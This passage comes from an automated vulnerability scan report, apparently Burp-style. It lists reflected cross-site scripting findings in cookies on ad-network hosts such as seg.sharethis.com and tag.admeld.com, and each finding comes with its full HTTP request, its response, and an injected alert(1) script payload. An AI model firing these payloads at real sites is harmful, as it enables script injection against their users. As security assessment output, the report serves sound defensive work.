Set-Cookie: PACIFIC_COMMENTS=""; Domain=.cbs.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: PACIFIC_AD_CALL=""; Domain=.cbs.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<VAST version="2.0">
<Ad id="1292013405">
<InLine>
<AdSystem>DART</AdSystem>
<AdTitle>233620153_Default_3</AdTitle>
<Description>(c) CBS</Descri
...[SNIP]...
540_10225;aseg=K05540_10269;aseg=K05540_10287;aseg=K05540_10290;aseg=K05540_10354;aseg=K05540_10390;aseg=K05540_10391;aseg=K05540_10394;aseg=K05540_10395;aseg=K05540_10537;aseg=K05540_10562;ord=260611?987fe<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>e0d75a0cfd6 -->
...[SNIP]...

3.840. http://seg.sharethis.com/getSegment.php [__stid cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://seg.sharethis.com
Path:	/getSegment.php

Issue detail

The value of the __stid cookie is copied into the HTML document as plain text between tags. The payload 53077<script>alert(1)</script>9a7e5c6772 was submitted in the __stid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /getSegment.php?purl=http%3A%2F%2Ftweetmyjobs.com%2F&jsref=&rnd=1303985019009 HTTP/1.1
Host: seg.sharethis.com
Proxy-Connection: keep-alive
Referer: http://tweetmyjobs.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __stid=CspT702sdV9LL0aNgCmJAg==53077<script>alert(1)</script>9a7e5c6772; __switchTo5x=64; __utmz=79367510.1303478681.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __unam=8f891fa-12f7d623a1f-609dccbc-23; __utma=79367510.1475296623.1303478681.1303478681.1303478681.1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.47
Date: Thu, 28 Apr 2011 10:03:33 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.3
P3P: "policyref="/w3c/p3p.xml", CP="ALL DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM"
Content-Length: 1367

           <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
           <html>
           <head>
           <meta http-equiv="Content-type" content="text/html;charset=UTF-8">

...[SNIP]...
<div style='display:none'>clicookie:CspT702sdV9LL0aNgCmJAg==53077<script>alert(1)</script>9a7e5c6772
userid:
</div>
...[SNIP]...

3.841. http://tag.admeld.com/ad/iframe/489/cbsnews/300x250/cbsnews_atf [meld_sess cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tag.admeld.com
Path:	/ad/iframe/489/cbsnews/300x250/cbsnews_atf

Issue detail

The value of the meld_sess cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2a534"><script>alert(1)</script>6c0cf080443 was submitted in the meld_sess cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /ad/iframe/489/cbsnews/300x250/cbsnews_atf?t=1303946311692&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fcbsinteractive.com&refer=http%3A%2F%2Fwww.cbsnews.com%2F HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/stories/2011/04/27/scitech/main20057741.shtml?tag=stack
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: meld_sess=ac5afe89-dbe3-4a99-9c60-59f4fb495cb92a534"><script>alert(1)</script>6c0cf080443; D41U=3ZP6aPgJzYQImYO2fkBZoKF-nc31zVj-pLzxjzthWC1M8tPub3s1d8g

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="DEVo PSDo OUR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
X-AdMeld-Debug: eyB0eXBlOiAgICAgICAgICJtZWxkIiwgIHB1YjogICAgICAgICAgNDg5LCAgc2l0ZTogICAgICAgICAiY2JzbmV3cyIsICBhZDogICAgICAgICAgIDU1NzQ0MTAsICBuZXR3b3JrOiAgICAgICJjYnNpIiwgIHNpemU6ICAgICAgICAgIjMwMHgyNTAiLCAgZnJlcTogICAgICAgICAiMS0yIiwgIGRlZmF1bHRzOiAgICAgIjAtMCIsICByZXF1ZXN0OiAgICAgICI0NzEwZGU0Ny0xZjgwLTRmYTgtYmQ2Yi01YzU1MzcxODI2MWYiLCAgdXNlcjogICAgICAgICAiYWM1YWZlODktZGJlMy00YTk5LTljNjAtNTlmNGZiNDk1Y2I5MmE1MzQiPjxzY3JpcHQ+YWxlcnQoMSk8L3NjcmlwdD42YzBjZjA4MDQ0MyIsICBjb3VudHJ5OiAgICAgICJVUyIsICBjaXR5OiAgICAgICAgICJEYWxsYXMiLCAgZG1hOiAgICAgICAgICA2MjMsICByZWdpb246ICAgICAgICJUWCIsICBpcDogICAgICAgICAgICIxNzMuMTkzLjIxNC4yNDMiLCAgZGVwdGg6ICAgICAgICAxLCAgdGFyZ2V0OiAgICAgICAiY2JzbmV3c19hdGYiLCAgZGl2OiAgICAgICAgICAiNDcxMGRlNDctMWY4MC00ZmE4LWJkNmItNWM1NTM3MTgyNjFmIiwgIHVybDogICAgICAgICAgImh0dHA6Ly9jYnNpbnRlcmFjdGl2ZS5jb20iLCAgZWxhcHNlZDogICAgICAwLCAgZGVjaXNpb246ICAgICAiYWQiLCAgaW1wOiAgICAgICAgICAxLCAgbmV0d29ya19pZDogICA2NzMsICBhY2NvdW50X2lkOiAgIDExOTI0MSwgIG5ldHdvcmtfbmFtZTogIkNCU2kgLSBBUkFuZXQiLCAgcHVibGlzaGVyX25hbWU6ICJjYnNpbnRlcmFjdGl2ZSIsICBlY3BtOiAgICAgICAgICIwLjUxIiwgIGZlY3BtOiAgICAgICAgIjAuNTEiLCAgZmlsbDogICAgICAgICAiMTAwLjAwIiwgIHBsYWNlbWVudDogICAgImNic25ld3NfYXRmIiwgIHJ1bGU6ICAgICAgICAgImNic25ld3NfYXRmIiwgIGNyZWF0aXZlX2lkOiAgIiIsICBiaWRkZXJzOiAgICAgIFt7Im5ldHdvcmtfbmFtZSI6Ik1heFBvaW50IEludGVyYWN0aXZlIChSVEIpIiwgImJpZCI6IjAuMDAiLCJhZCI6MzA2ODQwNywgImJ1eSI6MTc2LCJscCI6IiIsImFuIjoiIiwic3RhdHVzIjoibm8gYmlkIiwiZmlkIjowLCAiZmNwbSI6IjAuMDAifSx7Im5ldHdvcmtfbmFtZSI6Ik1lZGlhTWF0aCAoUlRCKSIsICJiaWQiOiIwLjAwIiwiYWQiOjMwNjkwNzUsICJidXkiOjUwMywibHAiOiIiLCJhbiI6IiIsInN0YXR1cyI6Im5vIGJpZCIsImZpZCI6MCwgImZjcG0iOiIwLjAwIn0seyJuZXR3b3JrX25hbWUiOiJUcmlnZ2l0IChSVEIpIiwgImJpZCI6IjAuMDAiLCJhZCI6MzA2OTYwNSwgImJ1eSI6MTI0MywibHAiOiIiLCJhbiI6IiIsInN0YXR1cyI6Im5vIGJpZCIsImZpZCI6MCwgImZjcG0iOiIwLjAwIn0seyJuZXR3b3JrX25hbWUiOiJUdXJuIChSVEIpIiwgImJpZCI6IjAuMDAiLCJhZCI6MzA2ODY1MiwgImJ1eSI6MTg5LCJscCI6Imh0dHA6Ly93d3cuc3ByaW50LmNvbS9sYW5kaW5ncy93ZWJvZmZlcnMvc2Vlay5odG1sP0VDSUQ9TUE6QUI6MjAxMTA0MTc6V0U6TFZFOlNFRUs6VjI6MzAweDI1MCIsImFuIjoiU3ByaW50IEVURCIsInN0YXR1cyI6IjAuMTQiLCJmaWQiOjYwNDQsICJmY3BtIjoiMTAwMC4wMCJ9LHsibmV0d29ya19uYW1lIjoiRGF0YVh1IChSVEIpIiwgImJpZCI6IjAuMDAiLCJhZCI6MzA2ODc1NywgImJ1eSI6MTk5LCJscCI6IiIsImFuIjoiIiwic3RhdHVzIjoibm8gYmlkIiwiZmlkIjowLCAiZmNwbSI6IjAuMDAifV0sICB0YXJnZXRpbmc6ICAgICIiLCAgYWR2ZXJ0aXNlcjogICAgIiIsICBsYW5kaW5nX3BhZ2U6ICAgICIiLCAgaG9zdDogICAgICAgICAibmotdGFnMTcifQ==
Content-Length: 1934
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:18:31 GMT
Connection: close

<html>
<body bgcolor="#ffffff" style="margin:0;padding:0">

<div style="width:300px;height:250px;margin:0;border:0">

...[SNIP]...
0" height="0" border="0" marginwidth="0" marginheight="0" frameborder="0" src="http://r.turn.com/server/pixel.htm?fpid=4&sp=y&admeld_call_type=iframe&admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb92a534"><script>alert(1)</script>6c0cf080443&admeld_adprovider_id=24&admeld_call_type=iframe&admeld_callback=http://tag.admeld.com/match">
...[SNIP]...

3.842. http://tag.admeld.com/ad/iframe/489/cbsnews/300x250/cbsnews_atf [meld_sess cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tag.admeld.com
Path:	/ad/iframe/489/cbsnews/300x250/cbsnews_atf

Issue detail

The value of the meld_sess cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cd7e9"><script>alert(1)</script>592eb5f0a92 was submitted in the meld_sess cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /ad/iframe/489/cbsnews/300x250/cbsnews_atf?t=1303946311692&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fcbsinteractive.com&refer=http%3A%2F%2Fwww.cbsnews.com%2F HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/stories/2011/04/27/scitech/main20057741.shtml?tag=stack
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: meld_sess=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9cd7e9"><script>alert(1)</script>592eb5f0a92; D41U=3ZP6aPgJzYQImYO2fkBZoKF-nc31zVj-pLzxjzthWC1M8tPub3s1d8g

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="DEVo PSDo OUR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
X-AdMeld-Debug: eyB0eXBlOiAgICAgICAgICJtZWxkIiwgIHB1YjogICAgICAgICAgNDg5LCAgc2l0ZTogICAgICAgICAiY2JzbmV3cyIsICBhZDogICAgICAgICAgIDU1NzQ0MTAsICBuZXR3b3JrOiAgICAgICJjYnNpIiwgIHNpemU6ICAgICAgICAgIjMwMHgyNTAiLCAgZnJlcTogICAgICAgICAiMS0yIiwgIGRlZmF1bHRzOiAgICAgIjAtMCIsICByZXF1ZXN0OiAgICAgICJhZDE4NjRmOC02MGFhLTQ2NGUtOGJjOS1hYjAwM2I5ZTg4YjEiLCAgdXNlcjogICAgICAgICAiYWM1YWZlODktZGJlMy00YTk5LTljNjAtNTlmNGZiNDk1Y2I5Y2Q3ZTkiPjxzY3JpcHQ+YWxlcnQoMSk8L3NjcmlwdD41OTJlYjVmMGE5MiIsICBjb3VudHJ5OiAgICAgICJVUyIsICBjaXR5OiAgICAgICAgICJEYWxsYXMiLCAgZG1hOiAgICAgICAgICA2MjMsICByZWdpb246ICAgICAgICJUWCIsICBpcDogICAgICAgICAgICIxNzMuMTkzLjIxNC4yNDMiLCAgZGVwdGg6ICAgICAgICAxLCAgdGFyZ2V0OiAgICAgICAiY2JzbmV3c19hdGYiLCAgZGl2OiAgICAgICAgICAiYWQxODY0ZjgtNjBhYS00NjRlLThiYzktYWIwMDNiOWU4OGIxIiwgIHVybDogICAgICAgICAgImh0dHA6Ly9jYnNpbnRlcmFjdGl2ZS5jb20iLCAgZWxhcHNlZDogICAgICAwLCAgZGVjaXNpb246ICAgICAiYWQiLCAgaW1wOiAgICAgICAgICAxLCAgbmV0d29ya19pZDogICA2NzMsICBhY2NvdW50X2lkOiAgIDExOTI0MSwgIG5ldHdvcmtfbmFtZTogIkNCU2kgLSBBUkFuZXQiLCAgcHVibGlzaGVyX25hbWU6ICJjYnNpbnRlcmFjdGl2ZSIsICBlY3BtOiAgICAgICAgICIwLjUxIiwgIGZlY3BtOiAgICAgICAgIjAuNTEiLCAgZmlsbDogICAgICAgICAiMTAwLjAwIiwgIHBsYWNlbWVudDogICAgImNic25ld3NfYXRmIiwgIHJ1bGU6ICAgICAgICAgImNic25ld3NfYXRmIiwgIGNyZWF0aXZlX2lkOiAgIiIsICBiaWRkZXJzOiAgICAgIFt7Im5ldHdvcmtfbmFtZSI6Ik1heFBvaW50IEludGVyYWN0aXZlIChSVEIpIiwgImJpZCI6IjAuMDAiLCJhZCI6MzA2ODQwNywgImJ1eSI6MTc2LCJscCI6IiIsImFuIjoiIiwic3RhdHVzIjoibm8gYmlkIiwiZmlkIjowLCAiZmNwbSI6IjAuMDAifSx7Im5ldHdvcmtfbmFtZSI6Ik1lZGlhTWF0aCAoUlRCKSIsICJiaWQiOiIwLjAwIiwiYWQiOjMwNjkwNzUsICJidXkiOjUwMywibHAiOiIiLCJhbiI6IiIsInN0YXR1cyI6Im5vIGJpZCIsImZpZCI6MCwgImZjcG0iOiIwLjAwIn0seyJuZXR3b3JrX25hbWUiOiJUcmlnZ2l0IChSVEIpIiwgImJpZCI6IjAuMDAiLCJhZCI6MzA2OTYwNSwgImJ1eSI6MTI0MywibHAiOiIiLCJhbiI6IiIsInN0YXR1cyI6Im5vIGJpZCIsImZpZCI6MCwgImZjcG0iOiIwLjAwIn0seyJuZXR3b3JrX25hbWUiOiJUdXJuIChSVEIpIiwgImJpZCI6IjAuMDAiLCJhZCI6MzA2ODY1MiwgImJ1eSI6MTg5LCJscCI6IiIsImFuIjoiIiwic3RhdHVzIjoibm8gYmlkIiwiZmlkIjowLCAiZmNwbSI6IjAuMDAifSx7Im5ldHdvcmtfbmFtZSI6IkRhdGFYdSAoUlRCKSIsICJiaWQiOiIwLjAwIiwiYWQiOjMwNjg3NTcsICJidXkiOjE5OSwibHAiOiIiLCJhbiI6IiIsInN0YXR1cyI6Im5vIGJpZCIsImZpZCI6MCwgImZjcG0iOiIwLjAwIn1dLCAgdGFyZ2V0aW5nOiAgICAiIiwgIGFkdmVydGlzZXI6ICAgICIiLCAgbGFuZGluZ19wYWdlOiAgICAiIiwgIGhvc3Q6ICAgICAgICAgIm5qLXRhZzI4In0=
Content-Length: 1934
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:18:31 GMT
Connection: close

<html>
<body bgcolor="#ffffff" style="margin:0;padding:0">

<div style="width:300px;height:250px;margin:0;border:0">

...[SNIP]...
<script type="text/javascript" src="http://pixel.invitemedia.com/admeld_sync?admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9cd7e9"><script>alert(1)</script>592eb5f0a92&admeld_adprovider_id=300&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match">
...[SNIP]...

3.843. http://tag.admeld.com/ad/iframe/489/cbsnews/300x250/cbsnews_btf [meld_sess cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tag.admeld.com
Path:	/ad/iframe/489/cbsnews/300x250/cbsnews_btf

Issue detail

The value of the meld_sess cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e4f11"><script>alert(1)</script>fc73d084083 was submitted in the meld_sess cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /ad/iframe/489/cbsnews/300x250/cbsnews_btf?t=1303946273585&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fcbsinteractive.com&refer= HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: meld_sess=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9e4f11"><script>alert(1)</script>fc73d084083; D41U=3ZP6aPgJzYQImYO2fkBZoKF-nc31zVj-pLzxjzthWC1M8tPub3s1d8g

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="DEVo PSDo OUR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
X-AdMeld-Debug: eyB0eXBlOiAgICAgICAgICJtZWxkIiwgIHB1YjogICAgICAgICAgNDg5LCAgc2l0ZTogICAgICAgICAiY2JzbmV3cyIsICBhZDogICAgICAgICAgIDU1NzQ0MTAsICBuZXR3b3JrOiAgICAgICJjYnNpIiwgIHNpemU6ICAgICAgICAgIjMwMHgyNTAiLCAgZnJlcTogICAgICAgICAiMS0yIiwgIGRlZmF1bHRzOiAgICAgIjAtMCIsICByZXF1ZXN0OiAgICAgICI1ZDU0YzkzYy04ZjMxLTQzODktOTAzZi00NGRjMmU3M2E1NWYiLCAgdXNlcjogICAgICAgICAiYWM1YWZlODktZGJlMy00YTk5LTljNjAtNTlmNGZiNDk1Y2I5ZTRmMTEiPjxzY3JpcHQ+YWxlcnQoMSk8L3NjcmlwdD5mYzczZDA4NDA4MyIsICBjb3VudHJ5OiAgICAgICJVUyIsICBjaXR5OiAgICAgICAgICJEYWxsYXMiLCAgZG1hOiAgICAgICAgICA2MjMsICByZWdpb246ICAgICAgICJUWCIsICBpcDogICAgICAgICAgICIxNzMuMTkzLjIxNC4yNDMiLCAgZGVwdGg6ICAgICAgICAxLCAgdGFyZ2V0OiAgICAgICAiY2JzbmV3c19idGYiLCAgZGl2OiAgICAgICAgICAiNWQ1NGM5M2MtOGYzMS00Mzg5LTkwM2YtNDRkYzJlNzNhNTVmIiwgIHVybDogICAgICAgICAgImh0dHA6Ly9jYnNpbnRlcmFjdGl2ZS5jb20iLCAgZWxhcHNlZDogICAgICAwLCAgZGVjaXNpb246ICAgICAiYWQiLCAgaW1wOiAgICAgICAgICAxLCAgbmV0d29ya19pZDogICA2NzMsICBhY2NvdW50X2lkOiAgIDExOTI0MSwgIG5ldHdvcmtfbmFtZTogIkNCU2kgLSBBUkFuZXQiLCAgcHVibGlzaGVyX25hbWU6ICJjYnNpbnRlcmFjdGl2ZSIsICBlY3BtOiAgICAgICAgICIwLjUxIiwgIGZlY3BtOiAgICAgICAgIjAuNTEiLCAgZmlsbDogICAgICAgICAiMTAwLjAwIiwgIHBsYWNlbWVudDogICAgImNic25ld3NfYnRmIiwgIHJ1bGU6ICAgICAgICAgImNic25ld3NfYnRmIiwgIGNyZWF0aXZlX2lkOiAgIiIsICBiaWRkZXJzOiAgICAgIFt7Im5ldHdvcmtfbmFtZSI6Ik1heFBvaW50IEludGVyYWN0aXZlIChSVEIpIiwgImJpZCI6IjAuMDAiLCJhZCI6MzA2ODQwNywgImJ1eSI6MTc2LCJscCI6IiIsImFuIjoiIiwic3RhdHVzIjoibm8gYmlkIiwiZmlkIjowLCAiZmNwbSI6IjAuMDAifSx7Im5ldHdvcmtfbmFtZSI6Ik1lZGlhTWF0aCAoUlRCKSIsICJiaWQiOiIwLjAwIiwiYWQiOjMwNjkwNzUsICJidXkiOjUwMywibHAiOiIiLCJhbiI6IiIsInN0YXR1cyI6Im5vIGJpZCIsImZpZCI6MCwgImZjcG0iOiIwLjAwIn0seyJuZXR3b3JrX25hbWUiOiJUcmlnZ2l0IChSVEIpIiwgImJpZCI6IjAuMDAiLCJhZCI6MzA2OTYwNSwgImJ1eSI6MTI0MywibHAiOiIiLCJhbiI6IiIsInN0YXR1cyI6Im5vIGJpZCIsImZpZCI6MCwgImZjcG0iOiIwLjAwIn0seyJuZXR3b3JrX25hbWUiOiJUdXJuIChSVEIpIiwgImJpZCI6IjAuMDAiLCJhZCI6MzA2ODY1MiwgImJ1eSI6MTg5LCJscCI6Imh0dHA6Ly93d3cuc3ByaW50LmNvbS9sYW5kaW5ncy93ZWJvZmZlcnMvc2Vlay5odG1sP0VDSUQ9TUE6QUI6MjAxMTA0MTc6V0U6TFZFOlNFRUs6VjI6MzAweDI1MCIsImFuIjoiU3ByaW50IEVURCIsInN0YXR1cyI6IjAuMTgiLCJmaWQiOjYwNDQsICJmY3BtIjoiMTAwMC4wMCJ9LHsibmV0d29ya19uYW1lIjoiRGF0YVh1IChSVEIpIiwgImJpZCI6IjAuMDAiLCJhZCI6MzA2ODc1NywgImJ1eSI6MTk5LCJscCI6IiIsImFuIjoiIiwic3RhdHVzIjoibm8gcmVzcG9uc2UiLCJmaWQiOjAsICJmY3BtIjoiMC4wMCJ9XSwgIHRhcmdldGluZzogICAgIiIsICBhZHZlcnRpc2VyOiAgICAiIiwgIGxhbmRpbmdfcGFnZTogICAgIiIsICBob3N0OiAgICAgICAgICJuai10YWcxNSJ9
Content-Length: 1934
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:17:51 GMT
Connection: close

<html>
<body bgcolor="#ffffff" style="margin:0;padding:0">

<div style="width:300px;height:250px;margin:0;border:0">

...[SNIP]...
<script type="text/javascript" src="http://pixel.invitemedia.com/admeld_sync?admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9e4f11"><script>alert(1)</script>fc73d084083&admeld_adprovider_id=300&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match">
...[SNIP]...

3.844. http://tag.admeld.com/ad/iframe/489/cbsnews/300x250/cbsnews_btf [meld_sess cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tag.admeld.com
Path:	/ad/iframe/489/cbsnews/300x250/cbsnews_btf

Issue detail

The value of the meld_sess cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6ca37"><script>alert(1)</script>3c7b33ecac5 was submitted in the meld_sess cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /ad/iframe/489/cbsnews/300x250/cbsnews_btf?t=1303946273585&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fcbsinteractive.com&refer= HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: meld_sess=ac5afe89-dbe3-4a99-9c60-59f4fb495cb96ca37"><script>alert(1)</script>3c7b33ecac5; D41U=3ZP6aPgJzYQImYO2fkBZoKF-nc31zVj-pLzxjzthWC1M8tPub3s1d8g

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="DEVo PSDo OUR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
X-AdMeld-Debug: eyB0eXBlOiAgICAgICAgICJtZWxkIiwgIHB1YjogICAgICAgICAgNDg5LCAgc2l0ZTogICAgICAgICAiY2JzbmV3cyIsICBhZDogICAgICAgICAgIDU1NzQ0MTAsICBuZXR3b3JrOiAgICAgICJjYnNpIiwgIHNpemU6ICAgICAgICAgIjMwMHgyNTAiLCAgZnJlcTogICAgICAgICAiMS0yIiwgIGRlZmF1bHRzOiAgICAgIjAtMCIsICByZXF1ZXN0OiAgICAgICI4MGMyNzA3NC04NmU1LTRhYzUtYjVhYy0zZjJkNDk0NTRlN2YiLCAgdXNlcjogICAgICAgICAiYWM1YWZlODktZGJlMy00YTk5LTljNjAtNTlmNGZiNDk1Y2I5NmNhMzciPjxzY3JpcHQ+YWxlcnQoMSk8L3NjcmlwdD4zYzdiMzNlY2FjNSIsICBjb3VudHJ5OiAgICAgICJVUyIsICBjaXR5OiAgICAgICAgICJEYWxsYXMiLCAgZG1hOiAgICAgICAgICA2MjMsICByZWdpb246ICAgICAgICJUWCIsICBpcDogICAgICAgICAgICIxNzMuMTkzLjIxNC4yNDMiLCAgZGVwdGg6ICAgICAgICAxLCAgdGFyZ2V0OiAgICAgICAiY2JzbmV3c19idGYiLCAgZGl2OiAgICAgICAgICAiODBjMjcwNzQtODZlNS00YWM1LWI1YWMtM2YyZDQ5NDU0ZTdmIiwgIHVybDogICAgICAgICAgImh0dHA6Ly9jYnNpbnRlcmFjdGl2ZS5jb20iLCAgZWxhcHNlZDogICAgICAwLCAgZGVjaXNpb246ICAgICAiYWQiLCAgaW1wOiAgICAgICAgICAxLCAgbmV0d29ya19pZDogICA2NzMsICBhY2NvdW50X2lkOiAgIDExOTI0MSwgIG5ldHdvcmtfbmFtZTogIkNCU2kgLSBBUkFuZXQiLCAgcHVibGlzaGVyX25hbWU6ICJjYnNpbnRlcmFjdGl2ZSIsICBlY3BtOiAgICAgICAgICIwLjUxIiwgIGZlY3BtOiAgICAgICAgIjAuNTEiLCAgZmlsbDogICAgICAgICAiMTAwLjAwIiwgIHBsYWNlbWVudDogICAgImNic25ld3NfYnRmIiwgIHJ1bGU6ICAgICAgICAgImNic25ld3NfYnRmIiwgIGNyZWF0aXZlX2lkOiAgIiIsICBiaWRkZXJzOiAgICAgIFt7Im5ldHdvcmtfbmFtZSI6Ik1heFBvaW50IEludGVyYWN0aXZlIChSVEIpIiwgImJpZCI6IjAuMDAiLCJhZCI6MzA2ODQwNywgImJ1eSI6MTc2LCJscCI6IiIsImFuIjoiIiwic3RhdHVzIjoibm8gYmlkIiwiZmlkIjowLCAiZmNwbSI6IjAuMDAifSx7Im5ldHdvcmtfbmFtZSI6Ik1lZGlhTWF0aCAoUlRCKSIsICJiaWQiOiIwLjAwIiwiYWQiOjMwNjkwNzUsICJidXkiOjUwMywibHAiOiIiLCJhbiI6IiIsInN0YXR1cyI6Im5vIGJpZCIsImZpZCI6MCwgImZjcG0iOiIwLjAwIn0seyJuZXR3b3JrX25hbWUiOiJUcmlnZ2l0IChSVEIpIiwgImJpZCI6IjAuMDAiLCJhZCI6MzA2OTYwNSwgImJ1eSI6MTI0MywibHAiOiIiLCJhbiI6IiIsInN0YXR1cyI6Im5vIGJpZCIsImZpZCI6MCwgImZjcG0iOiIwLjAwIn0seyJuZXR3b3JrX25hbWUiOiJUdXJuIChSVEIpIiwgImJpZCI6IjAuMDAiLCJhZCI6MzA2ODY1MiwgImJ1eSI6MTg5LCJscCI6Imh0dHA6Ly93d3cuZXZvbnkuY29tL2V2b255eGMxMS5odG1sP3R1cm5idDEmc2l0ZT0lN0JzaXRlX2lkX2Zyb21fYWRfbmV0d29yayU3RCIsImFuIjoiRXZvbnkiLCJzdGF0dXMiOiIwLjA3IiwiZmlkIj